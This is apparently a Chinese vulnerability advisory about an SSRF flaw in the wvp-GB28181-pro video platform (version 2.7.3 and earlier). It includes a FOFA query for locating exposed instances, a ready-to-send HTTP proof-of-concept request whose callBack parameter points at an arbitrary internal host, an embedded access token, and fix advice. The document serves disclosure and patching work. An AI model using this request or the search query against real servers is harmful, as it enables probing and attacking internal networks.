跳转至

wvp视频平台ssrf漏洞

wvp视频平台ssrf漏洞,攻击者能够以受害服务器的身份,去向内部网络或其他不可达环境发送恶意请求,从而进行内网信息探测或攻击脆弱服务。

影响版本

wvp-GB28181-pro<=2.7.3

漏洞状态

漏洞细节 漏洞POC 漏洞EXP 在野利用
已公开 已公开 已知

风险等级

维度 评价
威胁等级 高危
影响面 广
攻击者价值
利用难度

漏洞复现

FOFA:body="国标28181"

POC/EXP:

GET /api/rtp/receive/open?callId=12345&stream=ceshi&tcpMode=0&callBack=http://10.0.4.164:7777/ HTTP/1.1
Host: 10.52.200.62:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
access-token: eyJhbGciOiJSUzI1NiIsImtpZCI6IjNlNzk2NDZjNGRiYzQwODM4M2E5ZWVkMDlmMmI4NWFlIn0.eyJqdGkiOiJPbkFSREM4NEc2OWlxZG9rLVpjOE9BIiwiaWF0IjoxNzc5MjQ0NDY3LCJleHAiOjE3ODE4MzY0NjcsIm5iZiI6MTc3OTI0NDQ2Nywic3ViIjoibG9naW4iLCJhdWQiOiJBdWRpZW5jZSIsInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjIxMjMyZjI5N2E1N2E1YTc0Mzg5NGEwZTRhODAxZmMzIiwicm9sZUlkIjoxfQ.RMEUIp0cpIaX3JzL61YDCUUokEz2ze_YFZqvMp5yvDq0O6Rj0ZULxMGoSu2DYjaZ1WFwX-mA22qsSs48EZ0ZdiE_3I9qRVzwRP8ofndMM4RL0c_XB2KWeAKcam-US9dOtCNfNymiDNHdZ89HAJLdKGoRx44G0pFZtmrrLVWcr2jH905Z_cyVWJY_Qjf4OGpovv3qzpv88jdtPzkTcA0siIDJENE1O352GZJV3PWS73ewXuJFv2MW4BTiVumTQM3aqRwM1KeJTseRtyE9nVTghf0ZgxrbdbG1CSGV8ELdnO9ZuDOezRvIrS8FL33IyQ6ZR8cZ0vaS56jGm2LZ-1WvkA
Referer: http://10.52.200.62:18080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image-20260520143911360

image-20260520144114103

漏洞修复

关闭互联网暴露面或接口设置访问权限,升级至安全版本。